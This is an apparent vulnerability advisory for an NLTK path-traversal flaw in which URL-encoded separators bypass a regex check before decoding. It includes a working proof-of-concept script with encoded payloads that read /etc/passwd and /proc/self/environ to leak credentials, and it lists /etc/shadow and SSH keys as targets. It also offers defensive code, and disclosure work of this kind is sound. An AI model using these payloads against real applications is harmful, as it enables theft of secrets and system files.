PT-2026-49738 · Pypi · Nltk
Published: 2026-06-16 · Updated: 2026-06-16 · CVE-2026-54293
CVSS v3.1: 7.5 (High)
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Summary
nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem.
While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path.
Affected Component
nltk/data.py: find(), normalize_resource_url(), and the UNSAFE_NO_PROTOCOL_RE regex check.
Relevant occurrences:
data.py L650–L653: final path constructed from url2pathname(resource_name) after the checks
data.py L54–L69: UNSAFE_NO_PROTOCOL_RE operates only on the undecoded string
data.py L219–L245: normalize_resource_url() for the nltk: scheme contributes to decode-after-check
data.py L615–L618: defense-in-depth traversal check also operates on undecoded input
Root Cause
The regex UNSAFE_NO_PROTOCOL_RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path.
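The ordering problem can be reproduced without NLTK. The sketch below is only an illustration: UNSAFE_RE is a hypothetical stand-in for the advisory's regex (NLTK's real pattern may differ), and urllib.parse.unquote stands in for url2pathname(), which on POSIX systems essentially percent-decodes its argument.

```python
import re
from urllib.parse import unquote

# Hypothetical stand-in for the unsafe-path regex: rejects a leading "/"
# and any ".." path segment. NLTK's actual pattern may differ.
UNSAFE_RE = re.compile(r"^/|(^|/)\.\.(/|$)")


def check_then_decode(resource: str) -> str:
    """Vulnerable ordering: validate the raw string, then decode it."""
    if UNSAFE_RE.search(resource):
        raise ValueError(f"unsafe resource name: {resource!r}")
    return unquote(resource)  # assumption: stand-in for url2pathname()


def decode_then_check(resource: str) -> str:
    """Safer ordering: decode first, then validate the string actually used."""
    decoded = unquote(resource)
    if UNSAFE_RE.search(decoded):
        raise ValueError(f"unsafe resource name: {resource!r}")
    return decoded


payloads = [
    "%2fetc%2fpasswd",
    "corpora/%2e%2e/%2e%2e/etc/passwd",
    "corpora/..%2f..%2fetc%2fpasswd",
]
for payload in payloads:
    # Each encoded payload passes the raw-string check and decodes
    # into an absolute or traversing path.
    print(payload, "->", check_then_decode(payload))
```

With the checks reordered, decode_then_check() rejects all three payloads, because the regex now sees the same string that would reach the filesystem.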
Proof of Concept
"""
NLTK Arbitrary File Read via URL-Encoded Path Traversal
=======================================================
Bypasses UNSAFE_NO_PROTOCOL_RE security regex in nltk/data.py
by URL-encoding path separators and traversal components.

Affected: NLTK <= 3.9.4 (default ENFORCE=False configuration)
CWE: CWE-22 (Path Traversal)

Root Cause:
    nltk/data.py:find() checks resource names against a regex for
    traversal patterns (../, leading /, etc.) BEFORE calling
    url2pathname() which decodes %xx sequences. This is a classic
    "decode-after-check" vulnerability.
"""
import sys
import os
import warnings

# Suppress NLTK security warnings for clean PoC output
warnings.filterwarnings("ignore", category=RuntimeWarning)

# Setup
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "nltk"))
os.makedirs(os.path.expanduser("~/nltk_data/corpora"), exist_ok=True)

import nltk
from nltk.pathsec import ENFORCE

BANNER = """
===================================================
NLTK URL-Encoded Path Traversal PoC
Affected: nltk <= 3.9.4
Default ENFORCE={enforce}
===================================================
""".format(enforce=ENFORCE)

def test_variant(name, payload, fmt="raw"):
    """Test a single traversal variant."""
    try:
        content = nltk.data.load(payload, format=fmt)
        if isinstance(content, bytes):
            preview = content[:200].decode("utf-8", errors="replace")
        else:
            preview = content[:200]
        first_line = preview.split("\n")[0]
        print(f" [VULN] {name}")
        print(f" Payload: {payload}")
        print(f" Read OK: {first_line}")
        return True
    except Exception as e:
        print(f" [SAFE] {name}")
        print(f" Payload: {payload}")
        print(f" Blocked: {type(e).__name__}: {e}")
        return False

def main():
    print(BANNER)
    vulns = 0

    # --- Variant 1: URL-encoded absolute path ---
    print("[1] URL-encoded absolute path (%2f = /)")
    if test_variant(
        "Encoded leading slash bypasses ^/ regex check",
        "nltk:%2fetc%2fpasswd",
    ):
        vulns += 1
    print()

    # --- Variant 2: Encoded dot-dot traversal ---
    print("[2] URL-encoded dot-dot traversal (%2e = .)")
    if test_variant(
        "Encoded dots bypass ../ regex check",
        "nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    ):
        vulns += 1
    print()

    # --- Variant 3: Literal dots with encoded slash ---
    print("[3] Literal dots with encoded slash (..%2f)")
    if test_variant(
        "Encoded slash after literal .. bypasses ../ regex",
        "nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    ):
        vulns += 1
    print()

    # --- Variant 4: Read process environment (credential leak) ---
    print("[4] Read /proc/self/environ (credential leakage)")
    try:
        content = nltk.data.load("nltk:%2fproc%2fself%2fenviron", format="raw")
        # Entries in /proc/self/environ are NUL-separated
        env_vars = content.decode("utf-8", errors="replace").split("\x00")
        print(f" [VULN] Leaked {len(env_vars)} environment variables")
        for var in env_vars[:3]:
            if var:
                key = var.split("=")[0] if "=" in var else var
                print(f" {key}=...")
        vulns += 1
    except Exception as e:
        print(f" [SAFE] Blocked: {e}")
    print()

    # --- Control: verify normal traversal IS blocked ---
    print("[CONTROL] Verify literal ../ is blocked by regex")
    test_variant("Direct traversal (should be blocked)", "nltk:../../../etc/passwd")
    print()

    print("=" * 51)
    print(f" Result: {vulns} bypass variant(s) succeeded")
    if vulns > 0:
        print(" Status: VULNERABLE (url2pathname decodes after regex check)")
    else:
        print(" Status: Not vulnerable")
    print("=" * 51)


if __name__ == "__main__":
    main()

Impact
Arbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). Realistic targets include:
/etc/passwd, /etc/shadow (if readable)
/proc/self/environ — leaks environment variables, often containing API keys, DB credentials, cloud secrets
Application source code and configuration files
Cloud metadata, deployment secrets, SSH keys
This is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK's SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.
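Applications that forward untrusted identifiers could add their own guard in front of nltk.data.load(). The following is a minimal sketch under stated assumptions, not NLTK's patch: resolve_inside() and its root parameter are hypothetical names, unquote() again stands in for url2pathname(), and POSIX path semantics are assumed. It decodes first, refuses any leftover percent-escapes (which also rejects legitimate names containing %), and then checks that the resolved path stays under an allowed directory.

```python
from pathlib import Path
from urllib.parse import unquote


def resolve_inside(root: str, resource: str) -> Path:
    """Decode a resource name and confirm it resolves under `root`.

    Hypothetical helper for illustration; not part of NLTK.
    """
    decoded = unquote(resource)
    if "%" in decoded:
        # Conservative: refuse anything still carrying escapes,
        # which covers double-encoded payloads such as %252f.
        raise ValueError(f"residual percent-encoding in {resource!r}")
    base = Path(root).resolve()
    # Joining with an absolute path discards `base`, and resolve()
    # collapses ".." segments, so the containment test below catches both.
    candidate = (base / decoded).resolve()
    if candidate != base and base not in candidate.parents:
        raise ValueError(f"{resource!r} escapes {base}")
    return candidate
```

A caller would invoke resolve_inside() on the untrusted identifier and reject the request on ValueError before anything reaches NLTK. The containment test is applied to the fully resolved path, so it does not depend on enumerating every encoding of "/" or "..".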
Fix
Path traversal
Weakness Enumeration
Related Identifiers
Affected Products
Nltk